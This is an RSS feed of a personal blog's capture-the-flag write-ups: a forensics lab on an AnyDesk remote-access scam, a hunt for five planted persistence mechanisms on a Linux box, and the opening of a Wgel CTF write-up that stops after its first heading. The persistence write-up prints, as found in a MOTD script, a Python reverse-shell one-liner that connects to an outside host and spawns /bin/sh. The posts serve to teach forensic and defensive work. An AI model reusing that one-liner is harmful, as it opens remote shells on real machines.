<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Posts on harsh giri</title><link>https://quixtalia.in/post/</link><description>Recent content in Posts on harsh giri</description><generator>Hugo -- gohugo.io</generator><language>en-us</language><lastBuildDate>Fri, 20 Mar 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://quixtalia.in/post/index.xml" rel="self" type="application/rss+xml"/><item><title>Remote Access Regret</title><link>https://quixtalia.in/p/remote-access-regret/</link><pubDate>Fri, 20 Mar 2026 00:00:00 +0000</pubDate><guid>https://quixtalia.in/p/remote-access-regret/</guid><description>&lt;ul&gt;
&lt;li&gt;scenerio&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Image 1" class="gallery-image" data-flex-basis="607px" data-flex-grow="253" height="470" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/1.png" srcset="https://quixtalia.in/p/remote-access-regret/1_hu_698c534a5940ecfb.png 800w, https://quixtalia.in/p/remote-access-regret/1.png 1190w" width="1190"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="Image 2" class="gallery-image" data-flex-basis="577px" data-flex-grow="240" height="242" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/2.png" width="582"&gt;&lt;/p&gt;
&lt;p&gt;we get raw file&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;extract this using&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;span class="lnt"&gt;3
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;dd if=intelvol.raw of=output.img bs=512
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo mkdir /mnt/rar_image
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo mount -o loop output.img /mnt/rar_image
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img alt="Image 3" class="gallery-image" data-flex-basis="1073px" data-flex-grow="447" height="268" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/3.png" srcset="https://quixtalia.in/p/remote-access-regret/3_hu_6e605559b2fd8216.png 800w, https://quixtalia.in/p/remote-access-regret/3.png 1199w" width="1199"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;local AnyDesk ID&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Image 4" class="gallery-image" data-flex-basis="461px" data-flex-grow="192" height="599" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/4.png" srcset="https://quixtalia.in/p/remote-access-regret/4_hu_f9e285b487694eca.png 800w, https://quixtalia.in/p/remote-access-regret/4.png 1151w" width="1151"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;open this file in db browser&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Image 5" class="gallery-image" data-flex-basis="6289px" data-flex-grow="2620" height="39" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/5.png" srcset="https://quixtalia.in/p/remote-access-regret/5_hu_afe321e631c76e32.png 800w, https://quixtalia.in/p/remote-access-regret/5.png 1022w" width="1022"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;first website Margaret visited before encountering the scam&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;domain of the initial malicious redirect that led Margaret to the scam page&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Image 6" class="gallery-image" data-flex-basis="584px" data-flex-grow="243" height="509" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/6.png" srcset="https://quixtalia.in/p/remote-access-regret/6_hu_f88189fb129544fa.png 800w, https://quixtalia.in/p/remote-access-regret/6.png 1239w" width="1239"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Examining the cached HTML file, what phone number was displayed to the victim&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Image 7" class="gallery-image" data-flex-basis="530px" data-flex-grow="220" height="211" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/7.png" width="466"&gt;
&lt;img alt="Image 8" class="gallery-image" data-flex-basis="408px" data-flex-grow="170" height="851" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/8.png" srcset="https://quixtalia.in/p/remote-access-regret/8_hu_b8ff23ff3e0f7e3e.png 800w, https://quixtalia.in/p/remote-access-regret/8.png 1449w" width="1449"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;AnyDesk ID of the remote machine&lt;/li&gt;
&lt;li&gt;alias of scammer&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Image 9" class="gallery-image" data-flex-basis="610px" data-flex-grow="254" height="514" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/9.png" srcset="https://quixtalia.in/p/remote-access-regret/9_hu_ab491867fe0dff85.png 800w, https://quixtalia.in/p/remote-access-regret/9.png 1308w" width="1308"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;total session duration in seconds&lt;/li&gt;
&lt;li&gt;convert hourly duration to second 4052 sec&lt;/li&gt;
&lt;li&gt;first file stolen from Margaret&amp;rsquo;s Desktop&lt;/li&gt;
&lt;li&gt;How many bytes total exfiltrated&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Image 10" class="gallery-image" data-flex-basis="359px" data-flex-grow="149" height="656" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/10.png" srcset="https://quixtalia.in/p/remote-access-regret/10_hu_2b8ed664fad3b6cf.png 800w, https://quixtalia.in/p/remote-access-regret/10.png 982w" width="982"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;total URLs were visited during the browsing session on the day of the incident&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Image 11" class="gallery-image" data-flex-basis="584px" data-flex-grow="243" height="509" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/remote-access-regret/11.png" srcset="https://quixtalia.in/p/remote-access-regret/11_hu_f88189fb129544fa.png 800w, https://quixtalia.in/p/remote-access-regret/11.png 1239w" width="1239"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;it is 10&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;</description></item><item><title>hide and seek writeup</title><link>https://quixtalia.in/p/hide-and-seek-writeup/</link><pubDate>Mon, 16 Mar 2026 13:00:00 +0000</pubDate><guid>https://quixtalia.in/p/hide-and-seek-writeup/</guid><description>&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="457px" data-flex-grow="190" height="841" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/1.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/1_hu_82949d7d370a6516.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/1_hu_7ff2cd85bac1ad69.png 1600w, https://quixtalia.in/p/hide-and-seek-writeup/1.png 1604w" width="1604"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;so there are five flags combining them will give flag&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;em&gt;Time is on my side, always running like clockwork.&lt;/em&gt;&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;sounds like cronjob&lt;/li&gt;
&lt;li&gt;crontab -l as root&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;crontab -l -u root
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="880px" data-flex-grow="366" height="491" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/2.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/2_hu_68b07da5c1a9ec79.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/2_hu_8313a421d9622f9e.png 1600w, https://quixtalia.in/p/hide-and-seek-writeup/2.png 1801w" width="1801"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="5511px" data-flex-grow="2296" height="81" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/3.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/3_hu_cab56ccdcd236856.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/3_hu_43e364cace62adb5.png 1600w, https://quixtalia.in/p/hide-and-seek-writeup/3.png 1860w" width="1860"&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;find / -name &amp;#34;a.sh&amp;#34; -type f 2&amp;gt;/dev/null
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;found nothing&lt;/li&gt;
&lt;li&gt;maybe initial few number are hex&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;echo &amp;#34;54484d7b7930&amp;#34; | xxd -r -p
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;THM{y0&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;em&gt;A secret handshake gets me in every time.&lt;/em&gt;&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;this looks like ssh&lt;/li&gt;
&lt;li&gt;find .ssh folder&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;find / -name &amp;#34;.ssh&amp;#34; -type d 2&amp;gt;/dev/null
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;output&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;span class="lnt"&gt;3
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;/root/.ssh
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;/home/zeroday/.ssh
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;/home/ubuntu/.ssh
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;check all&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/home/zeroday/.ssh/.authorized_keys&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGigCKLtSqMcOfttFdDnNXfwKd5nH8Ws3hFNRmBDWxfvuaaC6h9zWishJVfr0xsyV0SSkMGPCuPLRU41ckvnGbA= 326e6420706172743a20755f6730745f.local
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;326e6420706172743a20755f6730745f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;this looks hex&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;echo &amp;#34;326e6420706172743a20755f6730745f&amp;#34; | xxd -r -p
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;2nd part: u_g0t_&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;em&gt;Whenever you set the stage, I make my entrance.&lt;/em&gt;&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;this was bit hard to spot&lt;/li&gt;
&lt;li&gt;it is about bashrc which loads our shell config.&lt;/li&gt;
&lt;li&gt;since we are specter according to q check that users bashrc&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="1972px" data-flex-grow="821" height="160" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/4.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/4_hu_472664f08274878d.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/4.png 1315w" width="1315"&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;echo &amp;#34;4d334a6b58334130636e513649444e324d334a3564416f3d&amp;#34; | xxd -r -p | base64 -d
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;3rd_p4rt: 3v3ryt&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;em&gt;i run with the big dogs, booting up alongside the system.&lt;/em&gt;&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;maybe process&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ps aux
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;pstree
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;nothing interesting&lt;/li&gt;
&lt;li&gt;maybe service&lt;/li&gt;
&lt;li&gt;To see all services, including inactive ones&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo su
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;systemctl list-unit-files --type=service
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="705px" data-flex-grow="293" height="441" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/5.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/5_hu_599051dc1dad512c.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/5.png 1296w" width="1296"&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;systemctl cat cipher.service
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;cat /lib/systemd/system/cipher.service
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="986px" data-flex-grow="411" height="409" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/6.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/6_hu_74b6292775e9a416.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/6_hu_6d52b9c31ebf8f86.png 1600w, https://quixtalia.in/p/hide-and-seek-writeup/6.png 1682w" width="1682"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img class="gallery-image" data-flex-basis="4110px" data-flex-grow="1712" height="64" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://quixtalia.in/p/hide-and-seek-writeup/7.png" srcset="https://quixtalia.in/p/hide-and-seek-writeup/7_hu_a4e019a4fdf9fabf.png 800w, https://quixtalia.in/p/hide-and-seek-writeup/7.png 1096w" width="1096"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;4th part - h1ng_&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;em&gt;I love welcome messages.&lt;/em&gt;&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;message of the day (MOTD)&lt;/li&gt;
&lt;li&gt;potential locations&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;span class="lnt"&gt;3
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;/etc/motd
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;/etc/profile.d/motd.sh
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;/etc/update-motd.d/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;in &lt;code&gt;cat /etc/update-motd.d/00-header&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;span class="lnt"&gt;2
&lt;/span&gt;&lt;span class="lnt"&gt;3
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;python3 -c &amp;#39;import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((&amp;#34;4c61737420706172743a206430776e7d0.h1dd3nd00r.n3t&amp;#34;,)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([&amp;#34;/bin/sh&amp;#34;,&amp;#34;-i&amp;#34;]);&amp;#39; 2&amp;gt;/dev/null
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;printf &amp;#34;Welcome to %s (%s %s %s)\n&amp;#34; &amp;#34;$DISTRIB_DESCRIPTION&amp;#34; &amp;#34;$(uname -o)&amp;#34; &amp;#34;$(uname -r)&amp;#34; &amp;#34;$(uname -m)&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;looks hex&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;echo &amp;#34;4c61737420706172743a206430776e7d0&amp;#34; | xxd -r -p
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;Last part: d0wn}&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;final flag&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;

 &lt;blockquote&gt;
 &lt;p&gt;THM{y0u_g0t_3v3ryt_h1ng_D0wn}&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;hr&gt;</description></item><item><title>wgel ctf writeup</title><link>https://quixtalia.in/p/wgel-ctf-writeup/</link><pubDate>Tue, 10 Mar 2026 21:00:21 +0000</pubDate><guid>https://quixtalia.in/p/wgel-ctf-writeup/</guid><description>&lt;h2 id="network-enumaration"&gt;network enumaration
&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;nmap scan&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;
&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;
&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class="lntd"&gt;
